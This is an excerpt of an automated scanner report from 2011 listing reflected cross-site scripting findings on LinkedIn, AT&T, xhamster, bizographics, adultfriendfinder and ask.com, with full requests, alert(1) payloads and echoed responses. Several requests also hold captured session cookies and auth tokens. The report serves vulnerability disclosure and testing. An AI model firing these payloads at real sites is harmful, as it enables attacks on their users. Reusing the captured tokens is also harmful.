Cookie: abt=98; cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; wz_uid=0A42E34A946D4254193520127E77B26A; wz_scnt=1; gcc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; clc=Q29tcHV0ZXJzX2FuZF9FbGVjdHJvbmljcy9Db21wdXRlcl9TZWN1cml0eS9OZXR3b3JrX1NlY3VyaXR5; ldst=sorg=-1|1313432679304; qh=1-eHNz; puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI0OjM5LVVUQw%3D%3D&po=0&pp=dir; qc=0; ldpt=porg=1066|0~1067|0~1037|0~1038|0~1068|0~5397|0; wz_sid=084EE34C926D4254193520127E77B26A; __utma=252994457.423467064.1313432713.1313432713.1313432713.1; __utmb=252994457.2.10.1313432713; __utmc=252994457; __utmz=252994457.1313432713.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/html;charset=UTF-8
tr-request-id: TkllNApcQDYAAEsEBg8AAADv
from-tr: trafrt006iad.io.askjeeves.info
Cache-Control: private
Content-Length: 67803
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:28:05 GMT
Connection: close
Set-Cookie: gcht=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: gc=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: __qca=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: puser=pt=TW9uLTE1LUF1Zy0yMDExLTE4OjI4OjA0LVVUQw%3D%3D&po=0&pp=dir; Domain=.ask.com; Expires=Tue, 14-Aug-2012 18:28:04 GMT; Path=/
Set-Cookie: gct=; Domain=.ask.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: qc=0; Domain=.ask.com; Path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Strict//EN">
<html>
<head>



...[SNIP]...
<iframe id="adi_adLoader" src="http://www.ask.com/display.html?cl=ca-aj-special&ch=&ty=image%2Cflash&size=300x250&kw=xss40b5e</script><script>alert(1)</script>b21e6c4ebb7&hints=xss40b5e</script>
...[SNIP]...

1.57. http://www.linkedin.com/countserv/count/share [url parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.linkedin.com
Path:   /countserv/count/share

Issue detail

The value of the url request parameter is copied into the HTML document as plain text between tags. The payload da1ff<img%20src%3da%20onerror%3dalert(1)>83d974f0d29 was submitted in the url parameter. This input was echoed as da1ff<img src=a onerror=alert(1)>83d974f0d29 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /countserv/count/share?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Fmarkets%2Fmarkets_newyork%2Fda1ff<img%20src%3da%20onerror%3dalert(1)>83d974f0d29 HTTP/1.1
Host: www.linkedin.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/markets/markets_newyork/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: visit=G; bcookie="v=1&ffb9fd87-5fef-4c75-aff7-69ec3ecfc40f"; __utma=23068709.1023992008.1312316317.1312316317.1312316317.1; __utmz=23068709.1312316317.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __qca=P0-606535281-1312316322746; leo_auth_token="GST:9kV4dA_13XEwRje4Ur-ws37Xd4cv3oxv5UwmamcnIX7CaxeBbLCcCO:1313432885:4ea5431fc1005486203c8da5c11ec53c95bd241b"; JSESSIONID="ajax:9204315133332545933"; lang="v=2&lang=en&c="; X-LI-IDC=C1; NSC_MC_QH_MFP=ffffffffaf19965845525d5f4f58455e445a4a42198c; NSC_MC_WT_FU_IUUQ=ffffffffaf1994c945525d5f4f58455e445a4a42198d

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:48:10 GMT
Content-Length: 156

IN.Tags.Share.handleCount({"count":0,"url":"http:\/\/money.cnn.com\/2011\/08\/15\/markets\/markets_newyork\/da1ff<img src=a onerror=alert(1)>83d974f0d29"});

1.58. http://www.wireless.att.com/cell-phone-service/packages/free-packages.jsp [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wireless.att.com
Path:   /cell-phone-service/packages/free-packages.jsp

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 90d55><a%20b%3dc>17435fcd4f5 was submitted in the source parameter. This input was echoed as 90d55><a b=c>17435fcd4f5 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cell-phone-service/packages/free-packages.jsp?source=ECWD000000000000O90d55><a%20b%3dc>17435fcd4f5 HTTP/1.1
Host: www.wireless.att.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: TLTUID=7284D2A8C16210C1695BC3E02554C7F2; ECOM_GTM=NA_osbth; cust_type=new; browserid=A001693504923; svariants=NA; DL3K=3_fK9L_XmvTCv3Jaj9415jcvofrDw_j4lng7oxa5Rw6yNCKjvqChmkg; 00d78e1f-01f0-45cd-9f9c-79e690335b05=%7B%22parent_id%22%3A%22kwkf9w9SRba%22%2C%22referrer%22%3A%22http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue%22%2C%22id%22%3A%22uo_OgfisI0f%22%2C%22wom%22%3Atrue%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.wireless.att.com%2Fcell-phone-service%2Fcell-phones%2Fcell-phones.jsp%3Ffeacondition%3Dallphones%26feaavailable%3Dallphones%26feapaytype%3Dstandard%26startFilter%3Dfalse%26allTypes%3Don%26osWindows%2520Phone%3D100012%26allManus%3Don%26source%3DECWD000000000000O%23fbid%253Dkwkf9w9SRba%26migAtlSA%3D341465538%26migAtlC%3D480d7815-42e6-4315-a737-64cdf14f8adc%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; bn_u=6923670900791695274; __utma=52846072.1104250127.1312768993.1312768993.1312768993.1; __utmz=52846072.1312768993.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=241758596.1378329856.1312769231.1312769231.1313431966.2; __utmz=241758596.1313431966.2.2.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utmb=241758596.1.10.1313431966

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 135165
Expires: Mon, 15 Aug 2011 18:20:38 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 15 Aug 2011 18:20:38 GMT
Connection: close
Set-Cookie: TLTHID=464A0280C76B10C7B2BBC420C1A5C223; Path=/; Domain=.att.com


                                                                                                                           
...[SNIP]...
<meta name=&quot;WT.mc_id&quot; content=&quot;ECWD000000000000O90d55><a b=c>17435fcd4f5&quot;>
...[SNIP]...

1.59. http://xhamster.com/signup.php [city parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the city request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1838"><script>alert(1)</script>64dd5f3a826dcd71f was submitted in the city parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallasd1838"><script>alert(1)</script>64dd5f3a826dcd71f&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:54 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m4
Vary: Accept-Encoding
Content-Length: 29363

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<input type="text" name="city" value="Dallasd1838"><script>alert(1)</script>64dd5f3a826dcd71f" />
...[SNIP]...

1.60. http://xhamster.com/signup.php [email parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the email request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e376d><script>alert(1)</script>ebfff57a20ad33bc8 was submitted in the email parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=&email=e376d><script>alert(1)</script>ebfff57a20ad33bc8&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:45 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m2
Vary: Accept-Encoding
Content-Length: 29358

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT type=text maxLength=60 size=20 name=email value=e376d><script>alert(1)</script>ebfff57a20ad33bc8>
...[SNIP]...

1.61. http://xhamster.com/signup.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5359a%3balert(1)//941552ed9d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5359a;alert(1)//941552ed9d6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/scrip/5359a%3balert(1)//941552ed9d6t%3E HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:17 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.2
Srv: m3
Vary: Accept-Encoding
Content-Length: 29239

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
</scrip/5359a;alert(1)//941552ed9d6t>
...[SNIP]...

1.62. http://xhamster.com/signup.php [next parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the HTML document as plain text between tags. The payload 47a9a<script>alert(1)</script>1fbbb0d5fcf was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E47a9a<script>alert(1)</script>1fbbb0d5fcf HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:16 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29357

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
</script>47a9a<script>alert(1)</script>1fbbb0d5fcf">
...[SNIP]...

1.63. http://xhamster.com/signup.php [next parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 71e9a"><script>alert(1)</script>f501e5879f9 was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /signup.php?next=71e9a"><script>alert(1)</script>f501e5879f9 HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: keep-alive
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:09:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29243

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next=71e9a"><script>alert(1)</script>f501e5879f9">
...[SNIP]...

1.64. http://xhamster.com/signup.php [next parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the next request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b305a"><script>alert(1)</script>18d9db32d7980cbc5 was submitted in the next parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27b305a"><script>alert(1)</script>18d9db32d7980cbc5&prev=&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:36 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m9
Vary: Accept-Encoding
Content-Length: 29429

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<FORM id=signupForm name=signupForm method=post action="http://xhamster.com/signup.php?next='b305a"><script>alert(1)</script>18d9db32d7980cbc5">
...[SNIP]...

1.65. http://xhamster.com/signup.php [prev parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the prev request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 57177"><script>alert(1)</script>d0d29e61179a32969 was submitted in the prev parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=57177"><script>alert(1)</script>d0d29e61179a32969&email=&username=&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:40 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.6
Srv: m13
Vary: Accept-Encoding
Content-Length: 29363

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT type="hidden" name="prev" value="57177"><script>alert(1)</script>d0d29e61179a32969">
...[SNIP]...

1.66. http://xhamster.com/signup.php [username parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://xhamster.com
Path:   /signup.php

Issue detail

The value of the username request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b was submitted in the username parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /signup.php?next=%27&prev=&email=&username=ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b&password1=&password2=&gender=Male&country=US&usa_region=TX&canada_region=&city=Dallas&recaptcha_challenge_field=03AHJ_Vus-HkBvRES1YRbzFHCL44Fft3MSYzVjNBzURKtlRV0wwjFDUQd3m1Kz5-7YO4_IKtQR2RIvThCyc6yiEkzQz9QsCn3_l5nHfddmsyhBl0eLo-nkvHGiqks6bWZcV7CUVfnL-mo9W0cnVDLsL-ybxIg1kOTFKQ&recaptcha_response_field=&action_signup=Sign+Up HTTP/1.1
Host: xhamster.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://xhamster.com/signup.php?next=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000259)%3C/script%3E
Cookie: ismobile=0; stats=74; __utma=26208500.1404966258.1313435099.1313435099.1313435099.1; __utmb=26208500.1.10.1313435099; __utmc=26208500; __utmz=26208500.1313435099.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; sc_limit=1

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Mon, 15 Aug 2011 19:07:49 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.2
Srv: m9
Vary: Accept-Encoding
Content-Length: 29361

<html>
<head>
<title>Register</title>
<meta name="description" content="Register"/>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name ="keywords" content ="porn, free porn
...[SNIP]...
<INPUT id="username_field" type="text" maxLength=20 name=username value=ffa66><script>alert(1)</script>4cbc2a1fa75fa2b7b>
...[SNIP]...

1.67. http://api.bizographics.com/v1/profile.json [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 4d0ae<script>alert(1)</script>36510e690a7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /v1/profile.json?&callback=cnnad_bizo_load_ad_callback&api_key=vuy5aqx2hg8yv997yw9e5jr4 HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
Referer: 4d0ae<script>alert(1)</script>36510e690a7
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a; BizoData=vipSsUXrfhMAyjSpNgk6T39Qb1MaQBj6WQYgisqeiidjQcqwKPXXDYVmkoawipO0Dfq1j0w30sQL9madkf8kozH7KX2vDEYkjj68aj5XcunNcMDa7Re6IGD4lLWOSE2iimqa3Ad6xyMUDLG5gCh8GmE4wmnnS9ty8xAR0zwQvdHhisgnnwCNICmFKGa6pvfuPrL6gLlop56fA3rHonFMZ1E3OcisUUeXmc77bBFklv3wQQEmtR5QpvePKBw6ArykBishtoVkEVUJBxdqAyD3lFIcLMteW4iiqSbERYipuWHxYXQtZCS6EipNN9QFd9eD8AHJR2FGdEz1hYSFbR3chAU2xWtyvDfXYqVKvKL6ku8zbNip0rRSsoluJtm3Lu8fisWbDneEWVJTB2iiSz7mTslQLR60k3zySHYwieie

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Mon, 15 Aug 2011 18:45:59 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=10bfcc64-3ea2-4415-b8f1-8adf14a38f1a;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 58
Connection: keep-alive

Unknown Referer: 4d0ae<script>alert(1)</script>36510e690a7

1.68. http://banners.adultfriendfinder.com/go/page/iframe_cm_26358 [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://banners.adultfriendfinder.com
Path:   /go/page/iframe_cm_26358

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c3b24"-alert(1)-"59d37ff595f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/page/iframe_cm_26358?dcb=sexfinder.com&pid=p1935206.submad_70975_1_s5232&madirect=http://medleyads.com/spot/c/1313434697/1376046894/10664.html HTTP/1.1
Host: banners.adultfriendfinder.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=c3b24"-alert(1)-"59d37ff595f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
